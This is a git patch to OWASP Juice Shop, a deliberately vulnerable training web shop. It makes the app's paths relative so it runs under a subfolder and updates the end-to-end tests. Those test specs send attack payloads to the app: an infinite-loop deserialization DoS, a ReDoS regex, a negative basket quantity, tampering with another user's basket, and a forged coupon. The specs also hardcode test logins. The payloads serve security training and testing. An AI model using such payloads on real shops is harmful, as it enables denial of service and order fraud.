From 1cba5476a84ae313b226078ae99bda2eac5a5301 Mon Sep 17 00:00:00 2001
From: JamesCullum <JamesCullum@users.noreply.github.com>
Date: Thu, 26 Mar 2020 13:27:32 +0100
Subject: [PATCH] =?UTF-8?q?-=20Fixed=20all=20absolute=20paths=20I=20could?=
 =?UTF-8?q?=20find=20-=20Fixed=20SSTI=20test,=20which=20failed=20because?=
 =?UTF-8?q?=20it=20didn=C3=84t=20trigger=20the=20serverside=20scoring=20-?=
 =?UTF-8?q?=20Fixed=20timing=20issues=20in=20registerSpec=20and=20contactS?=
 =?UTF-8?q?pec,=20where=20the=20XSS=20didn't=20work=20if=20the=20browser?=
 =?UTF-8?q?=20was=20too=20fast=20-=20Added=20code=20way=20to=20simulate=20?=
 =?UTF-8?q?a=20proxy=20environment=20ina=20=20subfolder.=20Run=20via=20"no?=
 =?UTF-8?q?de=20test/e2eSubfolder.js"=20-=20Added=20e2e=20test=20for=20sub?=
 =?UTF-8?q?folder.=20Run=20via=20"npm=20run=20e2e=20--=20subfolder"=20-=20?=
 =?UTF-8?q?Added=20e2e=20test=20for=20subfolder=20to=20travis?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: JamesCullum <JamesCullum@users.noreply.github.com>
---
 .travis.yml                                   |  8 +++-
 .../src/app/Services/socket-io.service.ts     |  4 +-
 .../src/app/payment/payment.component.html    |  8 ++--
 .../src/app/payment/payment.component.spec.ts |  6 +--
 frontend/src/app/payment/payment.component.ts |  6 +--
 .../src/app/sidenav/sidenav.component.html    |  2 +-
 .../app/token-sale/token-sale.component.html  |  2 +-
 frontend/src/assets/private/threejs-demo.html | 28 ++++++------
 lib/startup/customizeEasterEgg.js             |  2 +-
 lib/startup/registerWebsocketEvents.js        |  2 +-
 protractor.conf.js                            |  9 +++-
 protractor.subfolder.conf.js                  |  9 ++++
 routes/profileImageFileUpload.js              |  4 +-
 routes/profileImageUrlUpload.js               |  4 +-
 routes/updateUserProfile.js                   |  4 +-
 server.js                                     | 14 +++++-
 test/e2e/_sharedSpec.js                       |  9 +++-
 test/e2e/administrationSpec.js                |  4 +-
 test/e2e/b2bOrderSpec.js                      |  4 +-
 test/e2e/basketSpec.js                        | 22 +++++-----
 test/e2e/changePasswordSpec.js                |  6 +--
 test/e2e/complainSpec.js                      | 18 ++++----
 test/e2e/contactSpec.js                       | 19 ++++----
 test/e2e/dataExportSpec.js                    |  4 +-
 test/e2e/deluxeSpec.js                        |  2 +-
 test/e2e/forgedJwtSpec.js                     |  4 +-
 test/e2e/forgotPasswordSpec.js                |  2 +-
 test/e2e/loginSpec.js                         |  4 +-
 test/e2e/metricsSpec.js                       |  2 +-
 test/e2e/noSqlSpec.js                         | 32 +++++++-------
 test/e2e/privacyPolicySpec.js                 |  2 +-
 test/e2e/profileSpec.js                       | 14 +++---
 test/e2e/registerSpec.js                      | 26 ++++++-----
 test/e2e/restApiSpec.js                       | 33 +++++++++-----
 test/e2e/scoreBoardSpec.js                    |  8 ++--
 test/e2e/searchSpec.js                        | 10 ++---
 test/e2e/tokenSaleSpec.js                     |  2 +-
 test/e2e/totpSetupSpec.js                     |  4 +-
 test/e2e/trackingOrderSpec.js                 |  4 +-
 test/e2eSubfolder.js                          | 44 +++++++++++++++++++
 test/e2eTests.js                              | 12 ++++-
 views/promotionVideo.pug                      | 12 ++---
 views/userProfile.pug                         | 18 ++++----
 43 files changed, 271 insertions(+), 162 deletions(-)
 create mode 100644 protractor.subfolder.conf.js
 create mode 100644 test/e2eSubfolder.js

diff --git a/.travis.yml b/.travis.yml
index 7a08979733a..19eadcf1030 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -76,7 +76,13 @@ jobs:
       os: linux
       script:
         - export NODE_ENV=test
-        - npm run protractor
+        - npm run e2e
+    - stage: e2e
+      if: tag IS blank
+      os: linux
+      script:
+        - export NODE_ENV=test
+        - npm run e2e -- subfolder
     - stage: smoke
       if: tag IS blank
       os: linux
diff --git a/frontend/src/app/Services/socket-io.service.ts b/frontend/src/app/Services/socket-io.service.ts
index 8ae13727a29..b61421cdc1f 100644
--- a/frontend/src/app/Services/socket-io.service.ts
+++ b/frontend/src/app/Services/socket-io.service.ts
@@ -18,8 +18,8 @@ export class SocketIoService {
   constructor (private ngZone: NgZone) {
     this.ngZone.runOutsideAngular(() => {
       if (environment.hostServer === '.') {
-        this._socket = this.io.connect(window.location.href, {
-          path: (window.location.pathname === '/' ? '/' : window.location.pathname + '/') + 'socket.io'
+        this._socket = this.io.connect(window.location.origin, {
+          path: (window.location.pathname.endsWith('/') ? window.location.pathname : window.location.pathname + '/') + 'socket.io'
         })
       } else {
         this._socket = this.io.connect(environment.hostServer)
diff --git a/frontend/src/app/payment/payment.component.html b/frontend/src/app/payment/payment.component.html
index 43fe949d595..3a89e26f6d9 100644
--- a/frontend/src/app/payment/payment.component.html
+++ b/frontend/src/app/payment/payment.component.html
@@ -106,16 +106,16 @@
             <i style="margin-left: 3px;" class="fas fa-thumbs-up confirmation"></i>)
           </small>
           <div class="button-container" style="margin-top: 6px;">
-            <a href="/redirect?to=http://shop.spreadshirt.com/juiceshop">
+            <a href="./redirect?to=http://shop.spreadshirt.com/juiceshop">
               <button mat-stroked-button><i class="fas fa-tshirt fa-lg"></i> Spreadshirt (US)</button>
             </a>
-            <a href="/redirect?to=http://shop.spreadshirt.de/juiceshop">
+            <a href="./redirect?to=http://shop.spreadshirt.de/juiceshop">
               <button mat-stroked-button><i class="fas fa-tshirt fa-lg"></i> Spreadshirt (DE)</button>
             </a>
-            <a href="/redirect?to=https://www.stickeryou.com/products/owasp-juice-shop/794">
+            <a href="./redirect?to=https://www.stickeryou.com/products/owasp-juice-shop/794">
               <button mat-stroked-button><i class="fas fa-sticky-note fa-lg"></i> StickerYou</button>
             </a>
-            <a href="/redirect?to=http://leanpub.com/juice-shop">
+            <a href="./redirect?to=http://leanpub.com/juice-shop">
               <button mat-stroked-button><i class="fab fa-leanpub fa-lg"></i> Leanpub</button>
             </a>
           </div>
diff --git a/frontend/src/app/payment/payment.component.spec.ts b/frontend/src/app/payment/payment.component.spec.ts
index 8029375d302..68e11bb28b5 100644
--- a/frontend/src/app/payment/payment.component.spec.ts
+++ b/frontend/src/app/payment/payment.component.spec.ts
@@ -226,7 +226,7 @@ describe('PaymentComponent', () => {
     const data = {
       data: {
         data: 'bitcoin:1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
-        url: '/redirect?to=https://blockchain.info/address/1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
+        url: './redirect?to=https://blockchain.info/address/1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
         address: '1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
         title: 'TITLE_BITCOIN_ADDRESS'
       }
@@ -239,7 +239,7 @@ describe('PaymentComponent', () => {
     const data = {
       data: {
         data: 'dash:Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
-        url: '/redirect?to=https://explorer.dash.org/address/Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
+        url: './redirect?to=https://explorer.dash.org/address/Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
         address: 'Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
         title: 'TITLE_DASH_ADDRESS'
       }
@@ -252,7 +252,7 @@ describe('PaymentComponent', () => {
     const data = {
       data: {
         data: '0x0f933ab9fCAAA782D0279C300D73750e1311EAE6',
-        url: '/redirect?to=https://etherscan.io/address/0x0f933ab9fcaaa782d0279c300d73750e1311eae6',
+        url: './redirect?to=https://etherscan.io/address/0x0f933ab9fcaaa782d0279c300d73750e1311eae6',
         address: '0x0f933ab9fCAAA782D0279C300D73750e1311EAE6',
         title: 'TITLE_ETHER_ADDRESS'
       }
diff --git a/frontend/src/app/payment/payment.component.ts b/frontend/src/app/payment/payment.component.ts
index f6fd01a8078..ef0bfde530d 100644
--- a/frontend/src/app/payment/payment.component.ts
+++ b/frontend/src/app/payment/payment.component.ts
@@ -215,7 +215,7 @@ export class PaymentComponent implements OnInit {
     this.dialog.open(QrCodeComponent, {
       data: {
         data: 'bitcoin:1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
-        url: '/redirect?to=https://blockchain.info/address/1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
+        url: './redirect?to=https://blockchain.info/address/1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
         address: '1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm',
         title: 'TITLE_BITCOIN_ADDRESS'
       }
@@ -226,7 +226,7 @@ export class PaymentComponent implements OnInit {
     this.dialog.open(QrCodeComponent, {
       data: {
         data: 'dash:Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
-        url: '/redirect?to=https://explorer.dash.org/address/Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
+        url: './redirect?to=https://explorer.dash.org/address/Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
         address: 'Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW',
         title: 'TITLE_DASH_ADDRESS'
       }
@@ -237,7 +237,7 @@ export class PaymentComponent implements OnInit {
     this.dialog.open(QrCodeComponent, {
       data: {
         data: '0x0f933ab9fCAAA782D0279C300D73750e1311EAE6',
-        url: '/redirect?to=https://etherscan.io/address/0x0f933ab9fcaaa782d0279c300d73750e1311eae6',
+        url: './redirect?to=https://etherscan.io/address/0x0f933ab9fcaaa782d0279c300d73750e1311eae6',
         address: '0x0f933ab9fCAAA782D0279C300D73750e1311EAE6',
         title: 'TITLE_ETHER_ADDRESS'
       }
diff --git a/frontend/src/app/sidenav/sidenav.component.html b/frontend/src/app/sidenav/sidenav.component.html
index 27ea8883f0f..d73c05b4820 100644
--- a/frontend/src/app/sidenav/sidenav.component.html
+++ b/frontend/src/app/sidenav/sidenav.component.html
@@ -232,7 +232,7 @@ <h3 mat-subheader class="side-subHeader" translate>COMPANY</h3>
     </span>
   </a>
 
-  <a *ngIf="showGitHubLink" mat-list-item href="/redirect?to=https://github.com/bkimminich/juice-shop"
+  <a *ngIf="showGitHubLink" mat-list-item href="./redirect?to=https://github.com/bkimminich/juice-shop"
      aria-label="Go to OWASP Juice Shop GitHub page">
     <mat-icon matListIcon class="fab fa-github fa-lg"></mat-icon>
     <span class="menu-text truncate">
diff --git a/frontend/src/app/token-sale/token-sale.component.html b/frontend/src/app/token-sale/token-sale.component.html
index c0b5bbe7d53..0e6e9a95e40 100644
--- a/frontend/src/app/token-sale/token-sale.component.html
+++ b/frontend/src/app/token-sale/token-sale.component.html
@@ -88,7 +88,7 @@ <h5><i class='fas fa-comments fa-2x'></i> <span style="margin-left: 10px;" [inne
 
   </div>
 
-  <img src="/assets/public/images/padding/56px.png"/>
+  <img src="assets/public/images/padding/56px.png"/>
 </div>
 
 
diff --git a/frontend/src/assets/private/threejs-demo.html b/frontend/src/assets/private/threejs-demo.html
index 582c7d8347e..45c1663956d 100644
--- a/frontend/src/assets/private/threejs-demo.html
+++ b/frontend/src/assets/private/threejs-demo.html
@@ -2,15 +2,15 @@
 <html>
 <head>
     <title>Welcome to Planet Orangeuze</title>
-    <script src="/assets/private/three.js"></script>
-    <script src="/assets/private/OrbitControls.js"></script>
-    <script src="/assets/private/dat.gui.min.js"></script>
-    <script src="/assets/private/stats.min.js"></script>
-    <script src="/assets/private/EffectComposer.js"></script>
-    <script src="/assets/private/RenderPass.js"></script>
-    <script src="/assets/private/CopyShader.js"></script>
-    <script src="/assets/private/ShaderPass.js"></script>
-    <script src="/assets/private/MaskPass.js"></script>
+    <script src="assets/private/three.js"></script>
+    <script src="assets/private/OrbitControls.js"></script>
+    <script src="assets/private/dat.gui.min.js"></script>
+    <script src="assets/private/stats.min.js"></script>
+    <script src="assets/private/EffectComposer.js"></script>
+    <script src="assets/private/RenderPass.js"></script>
+    <script src="assets/private/CopyShader.js"></script>
+    <script src="assets/private/ShaderPass.js"></script>
+    <script src="assets/private/MaskPass.js"></script>
     <style>
         body {
             margin: 0;
@@ -86,7 +86,7 @@
     cameraBG.position.z = 50;
     sceneBG = new THREE.Scene();
 
-    var materialColor = new THREE.MeshBasicMaterial({ map: THREE.ImageUtils.loadTexture("/assets/private/starry_background.jpg"), depthTest: false });
+    var materialColor = new THREE.MeshBasicMaterial({ map: THREE.ImageUtils.loadTexture("assets/private/starry_background.jpg"), depthTest: false });
     var bgPlane = new THREE.Mesh(new THREE.PlaneGeometry(1, 1), materialColor);
     bgPlane.position.z = -100;
     bgPlane.scale.set(window.innerWidth * 2, window.innerHeight * 2, 1);
@@ -110,9 +110,9 @@
 
 
 function createOrangeMaterial() {
-    var orangeTexture = THREE.ImageUtils.loadTexture("/assets/private/orangemap2k.jpg");
-    var specularMap = THREE.ImageUtils.loadTexture("/assets/private/earthspec4k.jpg");
-    var normalMap = THREE.ImageUtils.loadTexture("/assets/private/earth_normalmap_flat4k.jpg");
+    var orangeTexture = THREE.ImageUtils.loadTexture("assets/private/orangemap2k.jpg");
+    var specularMap = THREE.ImageUtils.loadTexture("assets/private/earthspec4k.jpg");
+    var normalMap = THREE.ImageUtils.loadTexture("assets/private/earth_normalmap_flat4k.jpg");
 
     var orangeMaterial = new THREE.MeshPhongMaterial();
     orangeMaterial.map = orangeTexture;
@@ -127,7 +127,7 @@
 }
 
 function createCloudMaterial() {
-    var cloudTexture = THREE.ImageUtils.loadTexture("/assets/private/fair_clouds_4k.png");
+    var cloudTexture = THREE.ImageUtils.loadTexture("assets/private/fair_clouds_4k.png");
 
     var cloudMaterial = new THREE.MeshPhongMaterial();
     cloudMaterial.map = cloudTexture;
diff --git a/lib/startup/customizeEasterEgg.js b/lib/startup/customizeEasterEgg.js
index 883ac8e139c..7c5ad03c1c9 100644
--- a/lib/startup/customizeEasterEgg.js
+++ b/lib/startup/customizeEasterEgg.js
@@ -23,7 +23,7 @@ const customizeEasterEgg = () => {
 }
 
 const replaceImagePath = (overlay) => {
-  const textureDeclaration = 'orangeTexture = THREE.ImageUtils.loadTexture("/assets/private/' + overlay + '");'
+  const textureDeclaration = 'orangeTexture = THREE.ImageUtils.loadTexture("assets/private/' + overlay + '");'
   replace({
     regex: /orangeTexture = .*;/,
     replacement: textureDeclaration,
diff --git a/lib/startup/registerWebsocketEvents.js b/lib/startup/registerWebsocketEvents.js
index 7486fe7519d..dcd5b60e560 100644
--- a/lib/startup/registerWebsocketEvents.js
+++ b/lib/startup/registerWebsocketEvents.js
@@ -37,7 +37,7 @@ const registerWebsocketEvents = (server) => {
     })
 
     socket.on('verifySvgInjectionChallenge', data => {
-      utils.solveIf(challenges.svgInjectionChallenge, () => { return data && data.match(/.*\.\.\/\.\.\/\.\.\/\.\.\/redirect\?to=https?:\/\/placekitten.com\/(g\/)?[\d]+\/[\d]+.*/) && insecurity.isRedirectAllowed(data) })
+      utils.solveIf(challenges.svgInjectionChallenge, () => { return data && data.match(/.*\.\.\/\.\.\/\.\.\/\.\.[\w/-]*?\/redirect\?to=https?:\/\/placekitten.com\/(g\/)?[\d]+\/[\d]+.*/) && insecurity.isRedirectAllowed(data) })
     })
   })
 }
diff --git a/protractor.conf.js b/protractor.conf.js
index 2304bfb8ab1..88ac84022e6 100644
--- a/protractor.conf.js
+++ b/protractor.conf.js
@@ -3,6 +3,8 @@
  * SPDX-License-Identifier: MIT
  */
 
+const url = require('url')
+
 let proxy = {
   proxyType: 'autodetect'
 }
@@ -47,13 +49,16 @@ exports.config = {
       savePath: 'build/reports/e2e_results'
     }))
 
+    let basePath = (new url.URL(browser.baseUrl)).pathname
+    if (basePath === '/') basePath = ''
+
     // Get all banners out of the way
-    browser.get('/#')
+    browser.get(basePath + '/#')
     browser.manage().addCookie({ name: 'cookieconsent_status', value: 'dismiss' })
     browser.manage().addCookie({ name: 'welcomebanner_status', value: 'dismiss' })
 
     // Ensure score board shows all challenges (by default only 1-star challenges are shown)
-    browser.get('/#/score-board')
+    browser.get(basePath + '/#/score-board')
     element(by.id('btnToggleAllDifficulties')).click()
   }
 }
diff --git a/protractor.subfolder.conf.js b/protractor.subfolder.conf.js
new file mode 100644
index 00000000000..52e7b3922a4
--- /dev/null
+++ b/protractor.subfolder.conf.js
@@ -0,0 +1,9 @@
+/*
+ * Copyright (c) 2014-2020 Bjoern Kimminich.
+ * SPDX-License-Identifier: MIT
+ */
+
+const protractorConfig = require('./protractor.conf.js').config
+
+protractorConfig.baseUrl = 'http://localhost:3001/subfolder'
+exports.config = protractorConfig
diff --git a/routes/profileImageFileUpload.js b/routes/profileImageFileUpload.js
index 4c1c432a0bf..d34015b941e 100644
--- a/routes/profileImageFileUpload.js
+++ b/routes/profileImageFileUpload.js
@@ -30,8 +30,8 @@ module.exports = function fileUpload () {
         }).catch(error => {
           next(error)
         })
-        res.location('/profile')
-        res.redirect('/profile')
+        res.location((process.env.basePath || '') + '/profile')
+        res.redirect((process.env.basePath || '') + '/profile')
       } else {
         next(new Error('Blocked illegal activity by ' + req.connection.remoteAddress))
       }
diff --git a/routes/profileImageUrlUpload.js b/routes/profileImageUrlUpload.js
index c5db3514214..8926b01993c 100644
--- a/routes/profileImageUrlUpload.js
+++ b/routes/profileImageUrlUpload.js
@@ -33,7 +33,7 @@ module.exports = function profileImageUrlUpload () {
         next(new Error('Blocked illegal activity by ' + req.connection.remoteAddress))
       }
     }
-    res.location('/profile')
-    res.redirect('/profile')
+    res.location((process.env.basePath || '') + '/profile')
+    res.redirect((process.env.basePath || '') + '/profile')
   }
 }
diff --git a/routes/updateUserProfile.js b/routes/updateUserProfile.js
index 19beb037b4a..7eb29453311 100644
--- a/routes/updateUserProfile.js
+++ b/routes/updateUserProfile.js
@@ -23,7 +23,7 @@ module.exports = function updateUserProfile () {
     } else {
       next(new Error('Blocked illegal activity by ' + req.connection.remoteAddress))
     }
-    res.location('/profile')
-    res.redirect('/profile')
+    res.location((process.env.basePath || '') + '/profile')
+    res.redirect((process.env.basePath || '') + '/profile')
   }
 }
diff --git a/server.js b/server.js
index e0988bd2bae..81ea3e05868 100644
--- a/server.js
+++ b/server.js
@@ -181,7 +181,19 @@ const serveIndexMiddleware = (req, res, next) => {
   const origEnd = res.end
   res.end = function () {
     if (arguments.length) {
-      arguments[0] = arguments[0].replace(/a href="\/([^"]+?)"/, 'a href="$1"')
+      const reqPath = req.originalUrl.replace(/\?.*$/, '')
+      const currentFolder = reqPath.split('/').pop()
+      arguments[0] = arguments[0].replace(/a href="([^"]+?)"/gi, function (matchString, matchedUrl) {
+        let relativePath = path.relative(reqPath, matchedUrl)
+        if (relativePath === '') {
+          relativePath = currentFolder
+        } else if (!relativePath.startsWith('.') && currentFolder !== '') {
+          relativePath = currentFolder + '/' + relativePath
+        } else {
+          relativePath = relativePath.replace('..', '.')
+        }
+        return 'a href="' + relativePath + '"'
+      })
     }
     origEnd.apply(this, arguments)
   }
diff --git a/test/e2e/_sharedSpec.js b/test/e2e/_sharedSpec.js
index 6c47f4c4ed8..c6ad74b057e 100644
--- a/test/e2e/_sharedSpec.js
+++ b/test/e2e/_sharedSpec.js
@@ -4,12 +4,17 @@
  */
 
 const otplib = require('otplib')
+const url = require('url')
+
+let basePath = (new url.URL(browser.baseUrl)).pathname
+if (basePath === '/') basePath = ''
+protractor.basePath = basePath
 
 protractor.expect = {
   challengeSolved: function (context) {
     describe('(shared)', () => {
       beforeEach(() => {
-        browser.get('/#/score-board')
+        browser.get(protractor.basePath + '/#/score-board')
       })
 
       it("challenge '" + context.challenge + "' should be solved on score board", () => {
@@ -24,7 +29,7 @@ protractor.beforeEach = {
   login: function (context) {
     describe('(shared)', () => {
       beforeEach(() => {
-        browser.get('/#/login')
+        browser.get(protractor.basePath + '/#/login')
 
         element(by.id('email')).sendKeys(context.email)
         element(by.id('password')).sendKeys(context.password)
diff --git a/test/e2e/administrationSpec.js b/test/e2e/administrationSpec.js
index 54990de54e5..8b90641cb06 100644
--- a/test/e2e/administrationSpec.js
+++ b/test/e2e/administrationSpec.js
@@ -10,7 +10,7 @@ describe('/#/administration', () => {
     protractor.beforeEach.login({ email: 'admin@' + config.get('application.domain'), password: 'admin123' })
 
     it('should be possible to access administration section with admin user', () => {
-      browser.get('/#/administration')
+      browser.get(protractor.basePath + '/#/administration')
       expect(browser.getCurrentUrl()).toMatch(/\/administration/)
     })
 
@@ -21,7 +21,7 @@ describe('/#/administration', () => {
     protractor.beforeEach.login({ email: 'admin@' + config.get('application.domain'), password: 'admin123' })
 
     it('should be possible for any admin user to delete feedback', () => {
-      browser.get('/#/administration')
+      browser.get(protractor.basePath + '/#/administration')
 
       $$('.mat-cell.mat-column-remove > button').first().click()
       browser.wait(protractor.ExpectedConditions.stalenessOf(element(by.js(selectFiveStarRating))), 5000)
diff --git a/test/e2e/b2bOrderSpec.js b/test/e2e/b2bOrderSpec.js
index 5a0820ff58d..55f7007255a 100644
--- a/test/e2e/b2bOrderSpec.js
+++ b/test/e2e/b2bOrderSpec.js
@@ -13,7 +13,7 @@ describe('/b2b/v2/order', () => {
     describe('challenge "rce"', () => {
       it('an infinite loop deserialization payload should not bring down the server', () => {
         browser.waitForAngularEnabled(false)
-        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 500) { console.log("Success"); }}; xhttp.open("POST","http://localhost:3000/b2b/v2/orders/", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"orderLinesData": "(function dos() { while(true); })()"}));') // eslint-disable-line
+        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 500) { console.log("Success"); }}; xhttp.open("POST","'+browser.baseUrl+'/b2b/v2/orders/", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"orderLinesData": "(function dos() { while(true); })()"}));') // eslint-disable-line
         browser.driver.sleep(1000)
         browser.waitForAngularEnabled(true)
       })
@@ -24,7 +24,7 @@ describe('/b2b/v2/order', () => {
     describe('challenge "rceOccupy"', () => {
       it('should be possible to cause request timeout using a recursive regular expression payload', () => {
         browser.waitForAngularEnabled(false)
-        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 503) { console.log("Success"); }}; xhttp.open("POST","http://localhost:3000/b2b/v2/orders/", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"orderLinesData": "/((a+)+)b/.test(\'aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\')"}));') // eslint-disable-line
+        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 503) { console.log("Success"); }}; xhttp.open("POST","'+browser.baseUrl+'/b2b/v2/orders/", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"orderLinesData": "/((a+)+)b/.test(\'aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\')"}));') // eslint-disable-line
         browser.driver.sleep(3000) // 2sec for the deserialization timeout plus 1sec for Angular
         browser.waitForAngularEnabled(true)
       })
diff --git a/test/e2e/basketSpec.js b/test/e2e/basketSpec.js
index 8daa87a7dc5..508805bbe78 100644
--- a/test/e2e/basketSpec.js
+++ b/test/e2e/basketSpec.js
@@ -14,11 +14,11 @@ describe('/#/basket', () => {
     describe('challenge "negativeOrder"', () => {
       it('should be possible to update a basket to a negative quantity via the Rest API', () => {
         browser.waitForAngularEnabled(false)
-        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); }}; xhttp.open("PUT","http://localhost:3000/api/BasketItems/1", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"quantity": -100000}));') // eslint-disable-line
+        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); }}; xhttp.open("PUT","'+browser.baseUrl+'/api/BasketItems/1", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"quantity": -100000}));') // eslint-disable-line
         browser.driver.sleep(1000)
         browser.waitForAngularEnabled(true)
 
-        browser.get('/#/order-summary')
+        browser.get(protractor.basePath + '/#/order-summary')
 
         const productQuantities = $$('mat-cell.mat-column-quantity > span')
         expect(productQuantities.first().getText()).toMatch(/-100000/)
@@ -35,7 +35,7 @@ describe('/#/basket', () => {
       it('should access basket with id from session storage instead of the one associated to logged-in user', () => {
         browser.executeScript('window.sessionStorage.bid = 3;')
 
-        browser.get('/#/basket')
+        browser.get(protractor.basePath + '/#/basket')
 
         // TODO Verify functionally that it's not the basket of the admin
       })
@@ -46,7 +46,7 @@ describe('/#/basket', () => {
     describe('challenge "basketManipulateChallenge"', () => {
       it('should manipulate basket of other user instead of the one associated to logged-in user', () => {
         browser.waitForAngularEnabled(false)
-        browser.executeScript(() => {
+        browser.executeScript(baseUrl => {
           var xhttp = new XMLHttpRequest()
           xhttp.onreadystatechange = function () {
             if (this.status === 200) {
@@ -54,11 +54,11 @@ describe('/#/basket', () => {
             }
           }
 
-          xhttp.open('POST', 'http://localhost:3000/api/BasketItems/')
+          xhttp.open('POST', baseUrl + '/api/BasketItems/')
           xhttp.setRequestHeader('Content-type', 'application/json')
           xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`)
           xhttp.send('{ "ProductId": 14,"BasketId":"1","quantity":1,"BasketId":"2" }') //eslint-disable-line
-        })
+        }, browser.baseUrl)
         browser.driver.sleep(1000)
         browser.waitForAngularEnabled(true)
       })
@@ -76,7 +76,7 @@ describe('/#/basket', () => {
         browser.driver.sleep(1000)
         browser.waitForAngularEnabled(true)
 
-        browser.get('/#/payment/shop')
+        browser.get(protractor.basePath + '/#/payment/shop')
 
         browser.waitForAngularEnabled(false)
         browser.executeScript('event = new Date("March 08, 2019 00:00:00"); Date = function(Date){return function() {date = event; return date; }}(Date);')
@@ -92,7 +92,7 @@ describe('/#/basket', () => {
       })
 
       it('should be possible to place an order with the expired coupon', () => {
-        browser.get('/#/order-summary')
+        browser.get(protractor.basePath + '/#/order-summary')
         element(by.id('checkoutButton')).click()
       })
 
@@ -107,7 +107,7 @@ describe('/#/basket', () => {
       it('should be possible to add a product in the basket', () => {
         browser.waitForAngularEnabled(false)
         models.sequelize.query('SELECT * FROM PRODUCTS').then(([products]) => {
-          browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function () { if (this.status === 201) { console.log("Success") } } ; xhttp.open("POST", "http://localhost:3000/api/BasketItems/", true); xhttp.setRequestHeader("Content-type", "application/json"); xhttp.setRequestHeader("Authorization", `Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"BasketId": `${sessionStorage.getItem("bid")}`, "ProductId":' + 1 + ', "quantity": 1}))') // eslint-disable-line
+          browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function () { if (this.status === 201) { console.log("Success") } } ; xhttp.open("POST", "'+browser.baseUrl+'/api/BasketItems/", true); xhttp.setRequestHeader("Content-type", "application/json"); xhttp.setRequestHeader("Authorization", `Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"BasketId": `${sessionStorage.getItem("bid")}`, "ProductId":' + 1 + ', "quantity": 1}))') // eslint-disable-line
         })
         browser.driver.sleep(1000)
         browser.waitForAngularEnabled(true)
@@ -116,7 +116,7 @@ describe('/#/basket', () => {
       it('should be possible to enter a coupon that gives an 80% discount', () => {
         browser.executeScript('window.localStorage.couponPanelExpanded = false;')
 
-        browser.get('/#/payment/shop')
+        browser.get(protractor.basePath + '/#/payment/shop')
         browser.driver.sleep(1000)
         element(by.id('collapseCouponElement')).click()
         browser.wait(protractor.ExpectedConditions.presenceOf($('#coupon')), 5000, 'Coupon textfield not present.') // eslint-disable-line no-undef
@@ -127,7 +127,7 @@ describe('/#/basket', () => {
       })
 
       it('should be possible to place an order with a forged coupon', () => {
-        browser.get('/#/order-summary')
+        browser.get(protractor.basePath + '/#/order-summary')
         element(by.id('checkoutButton')).click()
       })
 
diff --git a/test/e2e/changePasswordSpec.js b/test/e2e/changePasswordSpec.js
index 7731e6edfef..e4349b3af40 100644
--- a/test/e2e/changePasswordSpec.js
+++ b/test/e2e/changePasswordSpec.js
@@ -12,7 +12,7 @@ describe('/#/privacy-security/change-password', () => {
     protractor.beforeEach.login({ email: 'morty@' + config.get('application.domain'), password: 'focusOnScienceMorty!focusOnScience' })
 
     beforeEach(() => {
-      browser.get('/#/privacy-security/change-password')
+      browser.get(protractor.basePath + '/#/privacy-security/change-password')
       currentPassword = element(by.id('currentPassword'))
       newPassword = element(by.id('newPassword'))
       newPasswordRepeat = element(by.id('newPasswordRepeat'))
@@ -33,9 +33,9 @@ describe('/#/privacy-security/change-password', () => {
     protractor.beforeEach.login({ email: 'bender@' + config.get('application.domain'), password: 'OhG0dPlease1nsertLiquor!' })
 
     it('should be able to change password via XSS-powered attack on password change without passing current password', () => {
